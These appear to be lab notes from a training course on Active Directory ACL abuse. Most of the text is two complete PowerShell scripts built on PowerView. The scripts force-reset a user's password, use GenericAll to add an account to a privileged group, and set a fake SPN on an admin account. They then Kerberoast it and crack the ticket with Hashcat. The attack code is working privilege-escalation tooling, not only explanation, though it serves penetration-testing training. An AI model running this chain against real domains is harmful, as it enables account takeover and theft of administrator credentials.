🦘Abuse Tactics
Here we are going to have to:
- Use the wley user to change the password for the damundsen user
- Authenticate as the damundsen user and leverage GenericAll rights to add a user that we control to the Help Desk Level 1 group
- Take advantage of nested group membership in the Information Technology group and leverage GenericAll rights to take control of the adunn user
So, first, we must authenticate as wley and force-change the password of the user damundsen (a force change relies on the ForceChangePassword right over the target, so we never need to know the old password). We can start by opening a PowerShell console and authenticating as the wley user; we could skip this step if we were already running as this user. To do this, we create a PSCredential object.
Now we can create the new password for the user damundsen ->
Finally, we use the Set-DomainUserPassword PowerView function to change the user's password. We need to use the -Credential flag with the credential object we created for the wley user. It's best to always specify the -Verbose flag to get feedback on the command. (We could do the same from a Linux attack host using a tool such as pth-net, which is part of the pth-toolkit.)
Now we can authenticate as the damundsen user (again through a PSCredential object) and add ourselves to the Help Desk Level 1 group with the Add-DomainGroupMember function.
Let's first check that we are not already a member of this group with this command ->
Then add ourselves ->
We can check whether the command was successful with the following command ->
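The first two steps of the chain, written out end to end as an added example (this is not code from the page or from the academy module). It assumes PowerView.ps1 is already imported, that the domain is called INLANEFREIGHT.LOCAL, and that the two passwords are placeholders you replace; the ACL check before the password change is an extra precaution, not something the notes above require.

```powershell
# Added example: abuse ForceChangePassword (wley -> damundsen) and then
# GenericAll (damundsen -> Help Desk Level 1) with PowerView.
# Assumptions: PowerView.ps1 is in the current directory, the domain is
# INLANEFREIGHT.LOCAL, and both passwords below are placeholders.
Import-Module .\PowerView.ps1

# --- Step 1: act as wley and force-change damundsen's password ---------------
$wleyPass = ConvertTo-SecureString 'WLEY_PASSWORD_HERE' -AsPlainText -Force
$wleyCred = New-Object System.Management.Automation.PSCredential('INLANEFREIGHT\wley', $wleyPass)

# The new password for damundsen; -AccountPassword expects a SecureString.
$damundsenPass = ConvertTo-SecureString 'NEW_DAMUNDSEN_PASSWORD_HERE' -AsPlainText -Force

# Check before acting: does wley really hold User-Force-Change-Password on damundsen?
# An empty result here means the chain will not work and we should stop.
$wleySid = Convert-NameToSid wley
Get-DomainObjectACL -Identity damundsen -ResolveGUIDs |
    Where-Object { $_.ObjectAceType -eq 'User-Force-Change-Password' -and "$($_.SecurityIdentifier)" -eq $wleySid }

# Force-change the password while authenticating as wley (no old password needed).
Set-DomainUserPassword -Identity damundsen -AccountPassword $damundsenPass -Credential $wleyCred -Verbose

# --- Step 2: act as damundsen and add a user we control to Help Desk Level 1 --
$damundsenCred = New-Object System.Management.Automation.PSCredential('INLANEFREIGHT\damundsen', $damundsenPass)

# Record the current membership first, so we know what to undo during cleanup.
Get-DomainGroupMember -Identity 'Help Desk Level 1' -Credential $damundsenCred |
    Select-Object MemberName

# Add damundsen itself to the group, authenticating as damundsen.
Add-DomainGroupMember -Identity 'Help Desk Level 1' -Members 'damundsen' -Credential $damundsenCred -Verbose

# Verify the add succeeded; this should now return one row for damundsen.
Get-DomainGroupMember -Identity 'Help Desk Level 1' -Credential $damundsenCred |
    Where-Object { $_.MemberName -eq 'damundsen' }
```

Because every PowerView call here binds to the DC afresh with the -Credential object, the new group membership is honoured immediately by the following commands; an existing interactive logon session would only see it after a new logon, since group membership is fixed in the token at logon time.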
At this point, we should be able to leverage our new group membership to take control of the adunn user. Now, let's say our client permitted us to change the password of the damundsen user, but the adunn user is an admin account whose password cannot be changed without disrupting operations. Since we have GenericAll rights over this account, we can instead perform a targeted Kerberoasting attack: modify the account's servicePrincipalName attribute to create a fake SPN, request a TGS ticket for that SPN (Kerberoast it), and (hopefully) crack the hash offline using Hashcat. The ticket is encrypted with adunn's long-term key, so a successful crack yields adunn's cleartext password without ever changing it.
We must be authenticated as a member of the Information Technology group for this to be successful. Since we added damundsen to the Help Desk Level 1 group, which is nested in Information Technology, we inherited its rights via nested group membership. We can now use Set-DomainObject to create the fake SPN. We could use the tool targetedKerberoast to perform this same attack from a Linux host; it creates a temporary SPN, retrieves the hash, and deletes the temporary SPN all in one command.
Creating a Fake SPN
If it works, we can Kerberoast the user ->
The academy lesson also covers cleanup (removing the fake SPN and undoing the group change) and remediation.
Work through the examples in this section to gain a better understanding of ACL abuse and performing these skills hands-on. Set a fake SPN for the adunn account, Kerberoast the user, and crack the hash using Hashcat. Submit the account's cleartext password as your answer.
We can see that the user is already a member of this group, and just to be sure we can ->
Then we can create a fake SPN and Kerberoast the account ->
Then we can copy the ticket to our local machine and try to crack it with Hashcat ->
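The third step, as described in the targeted Kerberoasting paragraphs above and repeated in the exercise, as one added example (not code from the page or the academy module). It assumes PowerView.ps1 is imported, the domain is INLANEFREIGHT.LOCAL, the damundsen password placeholder is the one set in step 2, and the SPN value notahacker/LEGIT and output file name are arbitrary choices; the nested-membership check and the cleanup branch are extra practitioner checks, not steps the notes above require.

```powershell
# Added example: targeted Kerberoasting of adunn via GenericAll, then cleanup.
# Assumptions: PowerView.ps1 is in the current directory, the domain is
# INLANEFREIGHT.LOCAL, and the damundsen password is the placeholder set earlier.
Import-Module .\PowerView.ps1
$damundsenPass = ConvertTo-SecureString 'NEW_DAMUNDSEN_PASSWORD_HERE' -AsPlainText -Force
$damundsenCred = New-Object System.Management.Automation.PSCredential('INLANEFREIGHT\damundsen', $damundsenPass)

# Check the nested membership we are relying on: damundsen must resolve as a
# (recursive) member of Information Technology, otherwise the write will be denied.
Get-DomainGroupMember -Identity 'Information Technology' -Recurse -Credential $damundsenCred |
    Where-Object { $_.MemberName -eq 'damundsen' }

# Record adunn's current servicePrincipalName so cleanup restores exactly that value.
$before = Get-DomainUser -Identity adunn -Credential $damundsenCred -Properties serviceprincipalname
$before.serviceprincipalname

# Write the fake SPN. It only has to be unique in the forest; the DC does not
# verify that any such service exists.
Set-DomainObject -Identity adunn -Credential $damundsenCred -Set @{serviceprincipalname='notahacker/LEGIT'} -Verbose

# Request a TGS for that SPN and save it in Hashcat format. The ticket is
# encrypted with adunn's key, so the crack recovers adunn's password.
Get-DomainUser -Identity adunn -Credential $damundsenCred |
    Get-DomainSPNTicket -Format Hashcat |
    Select-Object -ExpandProperty Hash |
    Out-File -Encoding ascii adunn_tgs.txt

# Offline cracking on the Linux attack host (a shell command, not PowerShell):
#   hashcat -m 13100 adunn_tgs.txt /usr/share/wordlists/rockyou.txt
# 13100 is Kerberos 5 TGS-REP etype 23 (RC4-HMAC), the $krb5tgs$23$ prefix.

# Cleanup: put the attribute back to what it was, or clear it if it was empty.
if ($before.serviceprincipalname) {
    Set-DomainObject -Identity adunn -Credential $damundsenCred -Set @{serviceprincipalname=$before.serviceprincipalname} -Verbose
} else {
    Set-DomainObject -Identity adunn -Credential $damundsenCred -Clear serviceprincipalname -Verbose
}
```

Look at the prefix of the saved hash before cracking: $krb5tgs$23$ is the RC4 ticket mode 13100 expects, whereas a ticket returned with AES (etype 18, prefix $krb5tgs$18$) needs Hashcat mode 19700 and is far slower to crack. Restoring the previous SPN value rather than blindly clearing the attribute matters on real engagements, since an admin account may legitimately carry SPNs that other services depend on.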